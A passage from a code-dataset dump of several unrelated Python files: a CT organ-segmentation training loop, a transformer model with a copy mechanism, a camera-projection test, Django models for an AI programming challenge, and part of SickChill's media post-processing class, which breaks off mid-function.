\n \n image.requires_grad=True #make sure they have a gradient for training\n mask.requires_grad=True\n\n image = image.to(device)\n mask = mask.to(device)\n\n loss = model.trainingStep(image,mask) #compute the loss of training prediction\n\n trainLossHistory.append(loss.item())\n loss.backward() #backpropagate\n optimizer.step()\n optimizer.zero_grad()\n\n # if iteration % 10 == 9:\n # print(\"Epoch # \" + str(epoch + 1) + \" --- \" + \"training on image #: \" + str(iteration+1))\n if iteration % 100 == 99:\n print(\"Epoch # \" + str(epoch + 1) + \" --- \" + \"training on image #: \" + str(iteration+1) + \" --- last 100 loss: \" + str(sum(trainLossHistory[-100:])/100))\n iteration += 1 \n \n #end of epoch: check validation loss and\n #Save the model:\n epoch_val = str(epoch) if epoch > 9 else \"0\" + str(epoch)\n if type(cross_val_idx) == int:\n model_path = os.path.join(path, \"Models\", organ, \"CV_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + \"CV\" + str(cross_val_idx) + \"_\" + epoch_val + \".pt\"))\n else: \n model_path = os.path.join(path, \"Models\", organ, \"Epoch_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + epoch_val + \".pt\"))\n torch.save(model.state_dict(), model_path) \n \n #for param_tensor in UNetModel.state_dict():\n # print(param_tensor, \"\\t\", 
UNetModel.state_dict()[param_tensor].size())\n #if param_tensor == \"multiresblock9.conv2d_bn_5x5.conv1.bias\":\n # print(UNetModel.state_dict()[0])\n\n #print(UNetModel.state_dict()[\"multiresblock1.conv2d_bn_1x1.conv1.weight\"])\n\n #dictionary = UNetModel.state_dict()\n\n #for key in dictionary:\n # print(key)\n\n #make a list of the hyperparameters and their labels \n hyperparameters = []\n\n hyperparameters.append([\"Model\", modelType])\n hyperparameters.append([\"Learning Rate\", lr])\n hyperparameters.append([\"Epochs Completed\", epoch])\n hyperparameters.append([\"Optimizer\", \"Adam\"])\n hyperparameters.append([\"Batch Size\", \"1\"])\n hyperparameters.append([\"Loss Function\", \"BCEWithLogitsLoss\"])\n if dataAugmentation == True:\n hyperparameters.append([\"Data Augmentation\", \"On\"])\n else:\n hyperparameters.append([\"Data Augmentation\", \"Off\"])\n\n #save the hyperparameters\n with open(os.path.join(path, \"Models/\" + organ + \"/HyperParameters_Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \".txt\"), \"wb\") as fp:\n pickle.dump(hyperparameters, fp)\n\n epochLoss = Validate(organ, model, path) #validation step\n epochLossHistory.append(epochLoss)\n print('Epoch # {}, Loss: {}'.format(epoch+1, epochLoss)) \n #reshape to have batch dimension in front\n \n #save the losses\n with open(os.path.join(path,\"Models\", organ, modelType.lower() + \"_\" + \"epochs\" + \".txt\"), \"wb\") as fp:\n pickle.dump(epoch, fp) \n if type(cross_val_idx) == int:\n with open(os.path.join(path, \"Models\", organ, \"CV\" + str(cross_val_idx) + \"_\" + modelType.lower() + \"_\" + \"epochLossHistory\" + \".txt\"), \"wb\") as fp:\n pickle.dump(epochLossHistory, fp) \n else:\n with open(os.path.join(path, \"Models\", organ, modelType.lower() + \"_\" + \"epochLossHistory\" + \".txt\"), \"wb\") as fp:\n pickle.dump(epochLossHistory, fp) \n \n #Now get model with lowest epoch loss and save to main model directory\n # min_loss_idx = epochLossHistory.index(min(epochLossHistory))\n # epoch_val = str(min_loss_idx) if min_loss_idx > 9 else \"0\" + str(min_loss_idx)\n # print(f\"Lowest validation loss found during the {min_loss_idx+1}th epoch. 
Saving this model to the main organ model directory.\")\n # if type(cross_val_idx) == int:\n # model_path = os.path.join(path, \"Models\", organ, \"CV_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + \"CV\" + str(cross_val_idx) + \"_\" + epoch_val + \".pt\"))\n # else: \n # model_path = os.path.join(path, \"Models\", organ, \"Epoch_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + epoch_val + \".pt\"))\n # model.load_state_dict(torch.load(model_path))\n # torch.save(model.state_dict(), os.path.join(path, \"Models\", organ, \"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \".pt\"))\n \n\n epoch_val=str(numEpochs-1)\n if type(cross_val_idx) == int:\n model_path = os.path.join(path, \"Models\", organ, \"CV_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + \"CV\" + str(cross_val_idx) + \"_\" + str(epoch_val) + \".pt\"))\n else: \n model_path = os.path.join(path, \"Models\", organ, \"Epoch_Models\", str(\"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + str(epoch_val) + \".pt\"))\n model.load_state_dict(torch.load(model_path))\n torch.save(model.state_dict(), os.path.join(path, \"Models\", organ, \"Model_\" + modelType.lower() + \"_\" + organ.replace(\" \", \"\") + \".pt\"))\n\ndef Validate(organ, model, path=None):\n \"\"\"Computes the average loss of the model on the validation data set. \n\n Args:\n organ (str): the organ to train the model on \n model (Module): the model to find the validation loss on\n\n Returns:\n float: the average loss on the entire validation data set\n\n \"\"\"\n\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n model.to(device)\n model = model.eval()\n dataPath = 'Processed_Data/' + organ + \"_Val/\"\n dataFolder = os.path.join(path, dataPath)\n dataFiles = sorted(os.listdir(dataFolder))\n lossHistory = []\n print('Validating')\n\n #creates the validation dataset \n val_dataset = CTDataset(dataFiles = dataFiles, root_dir = dataFolder, transform = None)\n\n #creates the validation dataloader \n val_loader = DataLoader(dataset = val_dataset, batch_size = 1, shuffle = True)\n iteration = 0 \n for i, (image, mask) in enumerate(val_loader):\n\n #validation does not require gradient calculations, turned off to reduce memory use \n with torch.no_grad():\n image = image.to(device)\n mask = mask.to(device)\n \n loss = model.validationStep(image,mask)\n lossHistory.append(loss.item())\n if iteration % 100 == 99:\n print(\"Validating on the \" + str(iteration + 1) + \"th image.\")\n iteration += 1 \n\n return sum(lossHistory) / len(lossHistory) \n\n \n \n \n","repo_name":"samplecm/Organogenesis","sub_path":"Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":27624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17545517748","text":"from torch import nn\nimport torch.nn.functional as F\nimport torch\nimport math\nfrom gnn_transformer import Encoder, Decoder\n\nclass CopyNet(nn.Module):\n def __init__(self, args):\n super(CopyNet, self).__init__()\n self.embedding_size = args.embedding_dim\n self.LinearSource = nn.Linear(self.embedding_size, self.embedding_size, bias=False)\n self.LinearTarget = nn.Linear(self.embedding_size, self.embedding_size, bias=False)\n self.LinearRes = nn.Linear(self.embedding_size, 1)\n self.LinearProb = nn.Linear(self.embedding_size, 2)\n def forward(self, source, traget):\n 
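# additive attention over (target, source) pairs yields unnormalized copy scores; LinearProb yields a generate/copy gate\n        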
sourceLinear = self.LinearSource(source)\n targetLinear = self.LinearTarget(traget)\n genP = self.LinearRes(F.tanh(sourceLinear.unsqueeze(1) + targetLinear.unsqueeze(2))).squeeze(-1)\n prob = F.softmax(self.LinearProb(traget), dim=-1)\n return genP, prob\n\n\n\nclass TransModel(nn.Module):\n def __init__(self, args):\n super(TransModel, self).__init__()\n self.embedding_dim = args.embedding_dim\n self.vocab_size = args.vocab_size\n self.sou_len = args.sou_len\n self.sub_token_len = args.sub_token_len\n \n self.encoder = Encoder(args, pad_token_id=0)\n self.decoder = Decoder(args, pad_token_id=0)\n self.out_fc = nn.Linear(args.embedding_dim, args.vocab_size)\n self.gate_fc = nn.Linear(args.embedding_dim, 1)\n self.copy_net = CopyNet(args)\n \n def forward(self, sou, tar, attr, mark, ast_change, edge, tar_label, sub_token, stage = 'train'):\n # source:batch * source_len\n # target: batch * target_len\n\n sou_mask = sou != 0\n tar_mask_pad = tar != 0\n sub_token_mask = sub_token != 0 \n\n sou_embedding, sub_token_embedding = self.encoder(sou, sou_mask, attr, mark, ast_change, edge, sub_token)\n\n sou_embedding = torch.cat((sou_embedding, sub_token_embedding), dim=1)\n # batch * (diff len + sub len) * embedding\n sou_mask = torch.cat((sou_mask, sub_token_mask), dim=1)\n \n tar_embedding = self.decoder(tar, sou_embedding, sou_mask, tar_mask_pad)\n # batch * tar_len * embedding\n tar_output_gen = self.out_fc(tar_embedding)\n # batch * tar_len * tar_vocab_size\n tar_output_gen = F.softmax(tar_output_gen, dim=-1)\n\n tar_output_copy, gate = self.copy_net(sou_embedding, tar_embedding)\n # batch * tar_len * (diff len + sub len)\n # batch * tar_len * 2\n tar_output_copy = torch.masked_fill(tar_output_copy, sou_mask.unsqueeze(1) == 0, -1e9)\n tar_output_copy = F.softmax(tar_output_copy, dim=-1)\n\n tar_output = torch.cat((gate[:,:,0].unsqueeze(-1) * tar_output_gen, gate[:,:,1].unsqueeze(-1) * tar_output_copy), dim=-1)\n # batch * tar_len * (vocab size + diff len + sub len)\n \n # print(torch.sum(tar_output,dim=-1))\n\n tar_output = torch.log(tar_output.clamp(min=1e-10, max=1)) \n\n pads = torch.zeros(tar_label.size(0),1) \n if torch.cuda.is_available():\n label = torch.cat([tar_label, pads.cuda(sou.device)], dim=-1)\n else:\n label = torch.cat([tar_label, pads], dim=-1)\n\n label = label[:,1:]\n label = label.long()\n mask = label != 0\n \n loss = F.nll_loss(tar_output.view(-1, self.vocab_size + self.sou_len + self.sub_token_len), label.contiguous().view(-1), reduction = 'none')\n loss = loss.masked_fill(mask.view(-1)==False, 0)\n if stage == 'train':\n return loss.sum(), mask.sum()\n elif stage == 'dev' or stage == 'test':\n return torch.argmax(tar_output, dim=-1)","repo_name":"DJjjjhao/FIRA-ICSE","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"37"} +{"seq_id":"16036761313","text":"import cv2\nimport numpy as np\nimport utils\nnp.random.seed(79)\nnp.set_printoptions(precision=4)\n\npts = np.random.randint(11, 50, size=(5, 3)) # 5-points\nK = np.load(\"../camMatrix_720p.npy\")\n\nX_cam1 = np.asarray([10, 25, 7]).reshape(3, -1)\nR1 = utils.rotate(thetax=90)\n\n# then t shall be\nt1 = -R1.dot(X_cam1)\n\nprint(\"-Rtranspose.t ie Cam centre is \", -R1.T.dot(t1)) #getting the x-cam is simply -R.inv().t since t = -R.X_cam\n\n# let's create the 3x4-Projection-matrix \nP1 = utils.P_from_krt(K, R1, t1)\nprint(\"Projection-Mat 1 is \", P1)\n\n\npts_2d = utils.project(P1, 
pts)\n\n\nprint(\"Finally points are \", pts_2d)\n \n\n\n","repo_name":"ChetanPatil28/3d_geometry","sub_path":"projection/test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18192392804","text":"import os\nimport uuid\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.fields import GenericRelation\n\nfrom apps.game.tasks import handle_submission\nfrom .game import Game\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _, ugettext\nfrom apps.accounts.models import Team\n# from apps.game.models.competition import Participant\n\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Challenge(models.Model):\n title = models.CharField(max_length=256)\n description = models.CharField(max_length=2048)\n start_time = models.DateTimeField()\n end_time = models.DateTimeField()\n registration_start_time = models.DateTimeField()\n registration_end_time = models.DateTimeField()\n registration_open = models.BooleanField()\n team_size = models.IntegerField()\n entrance_price = models.IntegerField() # In Toomans, 0 for free\n game = models.ForeignKey(Game)\n is_submission_open = models.BooleanField(null=False, blank=False, default=False)\n\n scoreboard_freeze_time = models.DateTimeField(null=True, blank=True)\n\n def __str__(self):\n return self.title\n\n def can_register(self):\n return self.registration_open # and (current time between reg_start_time and reg_end_time)\n\n def open_registration(self):\n self.registration_open = True\n self.save()\n\n def close_registration(self):\n self.registration_open = False\n self.save()\n\n\nclass TeamParticipatesChallenge(models.Model):\n team = models.ForeignKey(Team, related_name='challenges')\n challenge = models.ForeignKey(Challenge, related_name='teams')\n allow_random = models.NullBooleanField(blank=True, null=True)\n\n @property\n def should_pay(self):\n return self.challenge.entrance_price > 0\n\n @property\n def has_paid(self):\n from apps.billing.models import Transaction\n return Transaction.objects.filter(team=self, status='v').exists()\n\n @property\n def is_complete(self):\n users = UserAcceptsTeamInChallenge.objects.filter(\n team=self)\n return users.count() >= self.challenge.team_size and not list(filter(lambda x: not x.user.profile.is_complete, users))\n\n class Meta:\n unique_together = ('team', 'challenge')\n verbose_name_plural = 'Team Participates In Challenges'\n\n def __str__(self):\n team_name = ugettext('None')\n if self.team is not None:\n team_name = str(self.team)\n challenge_name = ugettext('None')\n if self.challenge is not None:\n challenge_name = str(self.challenge)\n return ugettext('Team: ') + team_name + ' ' + ugettext('Challenge: ') + challenge_name\n\n def all_members_accepted(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n user_participations = self.team.participants.all()\n ok = True\n for user_participation in user_participations:\n ok &= UserAcceptsTeamInChallenge.objects.filter(team=self, user=user_participation.user).exists()\n return ok\n\n def get_final_submission(self):\n \"\"\"\n :rtype: TeamSubmission\n \"\"\"\n try:\n return TeamSubmission.objects.filter(team=self, is_final=True).first()\n except TeamSubmission.DoesNotExist:\n return None\n\n def itself(self):\n return self.get_final_submission()\n\n def has_submitted(self):\n return self.get_final_submission() is 
not None\n\n\nclass UserAcceptsTeamInChallenge(models.Model):\n team = models.ForeignKey(TeamParticipatesChallenge, related_name='users_acceptance')\n user = models.ForeignKey(User, related_name='accepted_teams')\n\n class Meta:\n unique_together = ('team', 'user')\n\n\ndef get_submission_file_directory(instance, filename):\n return os.path.join(instance.team.id.__str__(), filename + uuid.uuid4().__str__() + '.zip')\n\n\nclass TeamSubmission(models.Model):\n LANGUAGE_CHOICES = (\n ('cpp', _('C++')),\n ('java', _('Java')),\n ('py3', _('Python 3'))\n )\n\n STATUS_CHOICES = (\n ('uploading', _('Uploading')),\n ('uploaded', _('Uploaded')),\n ('compiling', _('Compiling')),\n ('compiled', _('Compiled')),\n ('failed', _('Failed'))\n )\n\n team = models.ForeignKey(TeamParticipatesChallenge, related_name='submissions')\n file = models.FileField(upload_to=get_submission_file_directory)\n time = models.DateTimeField(auto_now_add=True)\n is_final = models.BooleanField(default=False)\n language = models.CharField(max_length=128, choices=LANGUAGE_CHOICES, default='java')\n status = models.CharField(max_length=128, choices=STATUS_CHOICES, default='uploading')\n infra_compile_message = models.CharField(max_length=1023, null=True, blank=True)\n infra_token = models.CharField(max_length=256, null=True, blank=True, unique=True)\n infra_compile_token = models.CharField(max_length=256, null=True, blank=True, unique=True)\n\n def __str__(self):\n return str(self.id) + ' team: ' + str(self.team) + ' is final: ' + str(self.is_final)\n\n def set_final(self):\n \"\"\"\n Use this method instead of changing the is_final attribute directly\n This makes sure that only one instance of TeamSubmission has is_final flag set to True\n \"\"\"\n if self.status != 'compiled':\n raise ValueError(_('This submission is not compiled yet.'))\n TeamSubmission.objects.filter(is_final=True, team=self.team).update(is_final=False)\n self.is_final = True\n self.save()\n\n def itself(self):\n return self\n\n def handle(self):\n if settings.TESTING:\n try:\n self.upload()\n self.compile()\n except Exception as error:\n logger.error(error)\n else:\n handle_submission.delay(self.id)\n\n def upload(self):\n from apps.game import functions\n self.infra_token = functions.upload_file(self.file)\n self.status = 'uploaded'\n self.save()\n\n def compile(self):\n from apps.game import functions\n result = functions.compile_submissions([self])\n if result[0]['success']:\n self.status = 'compiling'\n self.infra_compile_token = result[0]['run_id']\n else:\n logger.error(result[0][self.infra_token]['errors'])\n self.save()\n","repo_name":"SharifAIChallenge/aic_site","sub_path":"apps/game/models/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"13089618898","text":"import glob\nimport logging\nimport os\nimport re\nimport stat\nimport subprocess\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from processTV import ParseResult\n from sickchill.tv import TVShow\n\nfrom guessit import guessit\n\nimport sickchill.helper.common\nimport sickchill.oldbeard.subtitles\nfrom sickchill import adba, logger, settings\nfrom sickchill.helper.common import episode_num, get_extension, is_rar_file, remove_extension, replace_extension, SUBTITLE_EXTENSIONS\nfrom sickchill.helper.exceptions import EpisodeNotFoundException, EpisodePostProcessingFailedException, 
ShowDirectoryNotFoundException\nfrom sickchill.show.History import History\nfrom sickchill.show.Show import Show\n\nfrom . import common, db, helpers, notifiers, show_name_helpers\nfrom .helpers import verify_freespace\nfrom .name_parser.parser import InvalidNameException, InvalidShowException, NameParser\n\nMETHOD_COPY = \"copy\"\nMETHOD_MOVE = \"move\"\nMETHOD_HARDLINK = \"hardlink\"\nMETHOD_SYMLINK = \"symlink\"\nMETHOD_SYMLINK_REVERSED = \"symlink_reversed\"\n\nPROCESS_METHODS = [METHOD_COPY, METHOD_MOVE, METHOD_HARDLINK, METHOD_SYMLINK, METHOD_SYMLINK_REVERSED]\n\n\nclass PostProcessor(object):\n \"\"\"\n A class which will process a media file according to the post processing settings in the config.\n \"\"\"\n\n EXISTS_LARGER = 1\n EXISTS_SAME = 2\n EXISTS_SMALLER = 3\n DOESNT_EXIST = 4\n\n IGNORED_FILESTRINGS = [\".AppleDouble\", \".DS_Store\"]\n\n def __init__(self, directory, release_name=None, process_method=None, is_priority=None):\n \"\"\"\n Creates a new post processor with the given file path and optionally an NZB name.\n\n directory: The path to the folder to be processed\n release_name: The name of the release which resulted in this file being downloaded (optional)\n \"\"\"\n # absolute path to the folder that is being processed\n self.folder_path = os.path.dirname(os.path.abspath(directory))\n\n # full path to file\n self.directory = directory\n\n # file name only\n self.filename = os.path.basename(directory)\n\n # the name of the folder only\n self.folder_name = os.path.basename(self.folder_path)\n\n # name of the release that resulted in this folder\n self.release_name = release_name\n\n self.process_method = process_method if process_method else settings.PROCESS_METHOD\n\n self.in_history = False\n\n self.release_group = None\n\n self.is_proper = False\n\n self.is_priority = is_priority\n\n self.log = \"\"\n\n self.version = None\n\n self.anidbEpisode = None\n\n self.history = History()\n\n def _log(self, message, level=logging.INFO):\n \"\"\"\n A wrapper for the internal logger which also keeps track of messages and saves them to a string for later.\n\n :param message: The string to log (str)\n :param level: The log level to use (optional)\n \"\"\"\n logger.log(level, message)\n self.log += message + \"\\n\"\n\n def _checkForExistingFile(self, existing_file):\n \"\"\"\n Checks if a file exists already and if it does whether it's bigger or smaller than\n the file we are post processing\n\n ;param existing_file: The file to compare to\n\n :return:\n DOESNT_EXIST if the file doesn't exist\n EXISTS_LARGER if the file exists and is larger than the file we are post processing\n EXISTS_SMALLER if the file exists and is smaller than the file we are post processing\n EXISTS_SAME if the file exists and is the same size as the file we are post processing\n \"\"\"\n\n if not existing_file:\n self._log(_(\"There is no existing file so there's no worries about replacing it\"), logger.DEBUG)\n return PostProcessor.DOESNT_EXIST\n\n # if the new file exists, return the appropriate code depending on the size\n if os.path.isfile(existing_file):\n # see if it's bigger than our old file\n if os.path.getsize(existing_file) > os.path.getsize(self.directory):\n self._log(_(\"File {existing_file} is larger than {directory}\").format(existing_file=existing_file, directory=self.directory), logger.DEBUG)\n return PostProcessor.EXISTS_LARGER\n\n elif os.path.getsize(existing_file) == os.path.getsize(self.directory):\n self._log(_(\"File {existing_file} is the same size as 
{directory}\").format(existing_file=existing_file, directory=self.directory), logger.DEBUG)\n return PostProcessor.EXISTS_SAME\n\n else:\n self._log(_(\"File {existing_file} is smaller than {directory}\").format(existing_file=existing_file, directory=self.directory), logger.DEBUG)\n return PostProcessor.EXISTS_SMALLER\n\n else:\n self._log(_(\"File {existing_file} doesn't exist so there's no worries about replacing it\").format(existing_file=existing_file), logger.DEBUG)\n return PostProcessor.DOESNT_EXIST\n\n def list_associated_files(self, file_path, subtitles_only=False, subfolders=False, rename=False):\n \"\"\"\n For a given file path searches for files with the same name but different extension and returns their absolute paths\n\n :param file_path: The file to check for associated files\n :return: A list containing all files which are associated to the given file\n \"\"\"\n\n if not file_path:\n return []\n\n file_path_list_to_allow = []\n file_path_list_to_delete = []\n\n if subfolders:\n base_name = Path(file_path).stem\n else:\n base_name = remove_extension(file_path)\n\n # don't strip it all and use cwd by accident\n if not base_name:\n return []\n\n path_file = Path(file_path)\n dirname = path_file.parent\n\n # subfolders are only checked in show folder, so names will always be exactly alike\n if subfolders:\n file_list = list(str(found) for found in dirname.rglob(glob.escape(f\"{path_file.stem}\") + \"*\"))\n # this is called when PP, so we need to do the filename check case-insensitive\n else:\n file_list = list(str(found) for found in dirname.glob(glob.escape(f\"{path_file.stem}\") + \"*\"))\n\n for associated_file_path in file_list:\n # Exclude the video file we are post-processing\n if os.path.abspath(associated_file_path) == os.path.abspath(file_path):\n continue\n\n # If this is a renaming action in the show folder, we don't need to check anything, just add it to the list\n if rename:\n file_path_list_to_allow.append(associated_file_path)\n continue\n\n # Exclude non-subtitle files with the 'subtitles_only' option\n if subtitles_only and not associated_file_path.endswith(tuple(SUBTITLE_EXTENSIONS)):\n continue\n\n # Exclude .rar files from associated list\n if is_rar_file(associated_file_path):\n continue\n\n # Define associated files (all, allowed, and non-allowed)\n if os.path.isfile(associated_file_path):\n # check if allowed or not during post-processing\n if settings.MOVE_ASSOCIATED_FILES and associated_file_path.endswith(tuple(settings.ALLOWED_EXTENSIONS.split(\",\"))):\n file_path_list_to_allow.append(associated_file_path)\n elif settings.DELETE_NON_ASSOCIATED_FILES:\n file_path_list_to_delete.append(associated_file_path)\n\n if file_path_list_to_allow or file_path_list_to_delete:\n self._log(\n _(\"Found the following associated files for {file_path}: {allow_and_delete}\").format(\n file_path=file_path, allow_and_delete=file_path_list_to_allow + file_path_list_to_delete\n ),\n logger.DEBUG,\n )\n if file_path_list_to_delete:\n self._log(\n _(\"Deleting non-allowed associated files for {file_path}: {file_path_list_to_delete}\").format(\n file_path=file_path, file_path_list_to_delete=file_path_list_to_delete\n ),\n logger.DEBUG,\n )\n # Delete all extensions the user doesn't allow\n self._delete(file_path_list_to_delete)\n if file_path_list_to_allow:\n self._log(\n _(\"Allowing associated files for {file_path}: {file_path_list_to_allow}\").format(\n file_path=file_path, file_path_list_to_allow=file_path_list_to_allow\n ),\n logger.DEBUG,\n )\n else:\n 
self._log(_(\"No associated files for {file_path} were found during this pass\").format(file_path=file_path), logger.DEBUG)\n\n return file_path_list_to_allow\n\n def _delete(self, file_path, associated_files=False):\n \"\"\"\n Deletes the file and optionally all associated files.\n\n :param file_path: The file to delete\n :param associated_files: True to delete all files which differ only by extension, False to leave them\n \"\"\"\n\n if not file_path:\n return\n\n # Check if file_path is a list, if not, make it one\n if not isinstance(file_path, list):\n file_list = [file_path]\n else:\n file_list = file_path\n\n # figure out which files we want to delete\n if associated_files:\n file_list += self.list_associated_files(file_path, subfolders=True)\n\n if not file_list:\n self._log(_(\"There were no files associated with {file_path}, not deleting anything\").format(file_path=file_path), logger.DEBUG)\n return\n\n # delete the file and any other files which we want to delete\n for cur_file in file_list:\n if os.path.isfile(cur_file):\n self._log(_(\"Deleting file {cur_file}\").format(cur_file=cur_file), logger.DEBUG)\n # check first the read-only attribute\n file_attribute = os.stat(cur_file)[0]\n if not file_attribute & stat.S_IWRITE:\n # File is read-only, so make it writeable\n self._log(_(\"Read only mode on file {cur_file} Will try to make it writeable\").format(cur_file=cur_file), logger.DEBUG)\n try:\n os.chmod(cur_file, stat.S_IWRITE)\n except Exception:\n self._log(_(\"Cannot change permissions of {cur_file}\").format(cur_file=cur_file), logger.WARNING)\n\n os.remove(cur_file)\n\n # do the library update for synoindex\n notifiers.synoindex_notifier.deleteFile(cur_file)\n\n def _combined_file_operation(self, file_path, new_path, new_base_name, associated_files=False, action=None, subtitles=False):\n \"\"\"\n Performs a generic operation (move or copy) on a file. Can rename the file as well as change its location,\n and optionally move associated files too.\n\n :param file_path: The full path of the media file to act on\n :param new_path: Destination path where we want to move/copy the file to\n :param new_base_name: The base filename (no extension) to use during the copy. 
Use None to keep the same name.\n :param associated_files: Boolean, whether we should copy similarly-named files too\n :param action: function that takes an old path and new path and does an operation with them (move/copy)\n :param subtitles: Boolean, whether we should process subtitles too\n \"\"\"\n\n if not action:\n self._log(_(\"Must provide an action for the combined file operation\"), logger.ERROR)\n return\n\n file_list = [file_path]\n subfolders = os.path.normpath(os.path.dirname(file_path)) != os.path.normpath(settings.TV_DOWNLOAD_DIR)\n if associated_files:\n file_list += self.list_associated_files(file_path, subfolders=subfolders)\n elif subtitles:\n file_list += self.list_associated_files(file_path, subtitles_only=True, subfolders=subfolders)\n\n if not file_list:\n self._log(_(\"There were no files associated with {file_path}, not moving anything\").format(file_path=file_path), logger.DEBUG)\n return\n\n # deal with all files\n for cur_file_path in file_list:\n path_current_file = Path(cur_file_path)\n cur_extension = get_extension(path_current_file)\n # check if file have subtitles language\n if cur_extension in SUBTITLE_EXTENSIONS and \".\" in path_current_file.stem:\n cur_lang = get_extension(path_current_file.with_suffix(\"\"), lower=True)\n # pt_BR is a special case, subliminal does not handle it well\n if cur_lang == \"pt-br\":\n cur_lang = \"pt-BR\"\n\n # Check that this is a valid subtitle language for this subtitle, and if so prepend the extension with it so it is retained\n cur_lang_name = sickchill.oldbeard.subtitles.from_code(cur_lang).name\n if new_base_name and cur_lang == \"pt-BR\" or cur_lang_name != \"Undetermined\":\n cur_extension = \".\".join((cur_lang, cur_extension))\n\n # replace .nfo with .nfo-orig to avoid conflicts\n if cur_extension == \"nfo\" and settings.NFO_RENAME is True:\n cur_extension = \"nfo-orig\"\n\n # If new base name then convert name\n if new_base_name:\n new_filename = \".\".join((new_base_name, cur_extension))\n # if we're not renaming we still want to change extensions sometimes\n else:\n new_filename = os.path.basename(replace_extension(cur_file_path, cur_extension))\n\n if settings.SUBTITLES_DIR and cur_extension.endswith(tuple(SUBTITLE_EXTENSIONS)):\n subs_new_path = os.path.join(new_path, settings.SUBTITLES_DIR)\n dir_exists = helpers.makeDir(subs_new_path)\n if not dir_exists:\n logger.exception(_(\"Unable to create subtitles folder {subs_new_path}\").format(subs_new_path=subs_new_path))\n else:\n helpers.chmodAsParent(subs_new_path)\n new_file_path = os.path.join(subs_new_path, new_filename)\n else:\n new_file_path = os.path.join(new_path, new_filename)\n\n action(cur_file_path, new_file_path)\n\n def _move(self, file_path, new_path, new_base_name, associated_files=False, subtitles=False):\n \"\"\"\n Move file and set proper permissions\n\n :param file_path: The full path of the media file to move\n :param new_path: Destination path where we want to move the file to\n :param new_base_name: The base filename (no extension) to use during the move. 
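On failure the underlying helpers.moveFile error is logged and the exception re-raised.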
Use None to keep the same name.\n :param associated_files: Boolean, whether we should move similarly-named files too\n \"\"\"\n\n def _int_move(cur_file_path, new_file_path):\n self._log(_(\"Moving file from {cur_file_path} to {new_file_path}\").format(cur_file_path=cur_file_path, new_file_path=new_file_path), logger.DEBUG)\n try:\n helpers.moveFile(cur_file_path, new_file_path)\n helpers.chmodAsParent(new_file_path)\n except (IOError, OSError) as error:\n self._log(\n _(\"Unable to move file from {cur_file_path} to {new_file_path}: {error}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path, error=error\n ),\n logger.ERROR,\n )\n raise\n\n self._combined_file_operation(file_path, new_path, new_base_name, associated_files, action=_int_move, subtitles=subtitles)\n\n def _copy(self, file_path, new_path, new_base_name, associated_files=False, subtitles=False):\n \"\"\"\n Copy file and set proper permissions\n\n :param file_path: The full path of the media file to copy\n :param new_path: Destination path where we want to copy the file to\n :param new_base_name: The base filename (no extension) to use during the copy. Use None to keep the same name.\n :param associated_files: Boolean, whether we should copy similarly-named files too\n \"\"\"\n\n def _int_copy(cur_file_path, new_file_path):\n self._log(_(\"Copying file from {cur_file_path} to {new_file_path}\").format(cur_file_path=cur_file_path, new_file_path=new_file_path), logger.DEBUG)\n try:\n helpers.copyFile(cur_file_path, new_file_path)\n helpers.chmodAsParent(new_file_path)\n except (IOError, OSError) as error:\n self._log(\n _(\"Unable to copy file from {cur_file_path} to {new_file_path}: {error}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path, error=error\n ),\n logger.ERROR,\n )\n raise\n\n self._combined_file_operation(file_path, new_path, new_base_name, associated_files, action=_int_copy, subtitles=subtitles)\n\n def _hardlink(self, file_path, new_path, new_base_name, associated_files=False, subtitles=False):\n \"\"\"\n Hardlink file and set proper permissions\n\n :param file_path: The full path of the media file to move\n :param new_path: Destination path where we want to create a hard linked file\n :param new_base_name: The base filename (no extension) to use during the link. 
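Note that hard linking only works when new_path is on the same filesystem as the source file.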
Use None to keep the same name.\n :param associated_files: Boolean, whether we should move similarly-named files too\n \"\"\"\n\n def _int_hard_link(cur_file_path, new_file_path):\n self._log(\n _(\"Hard linking file from {cur_file_path} to {new_file_path}\").format(cur_file_path=cur_file_path, new_file_path=new_file_path), logger.DEBUG\n )\n try:\n helpers.hardlinkFile(cur_file_path, new_file_path)\n helpers.chmodAsParent(new_file_path)\n except (IOError, OSError) as error:\n self._log(\n _(\"Unable to link file from {cur_file_path} to {new_file_path}: {error}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path, error=error\n ),\n logger.ERROR,\n )\n raise\n\n self._combined_file_operation(file_path, new_path, new_base_name, associated_files, action=_int_hard_link, subtitles=subtitles)\n\n def _moveAndSymlink(self, file_path, new_path, new_base_name, associated_files=False, subtitles=False):\n \"\"\"\n Move file, symlink source location back to destination, and set proper permissions\n\n :param file_path: The full path of the media file to move\n :param new_path: Destination path where we want to move the file to create a symbolic link to\n :param new_base_name: The base filename (no extension) to use during the link. Use None to keep the same name.\n :param associated_files: Boolean, whether we should move similarly-named files too\n \"\"\"\n\n def 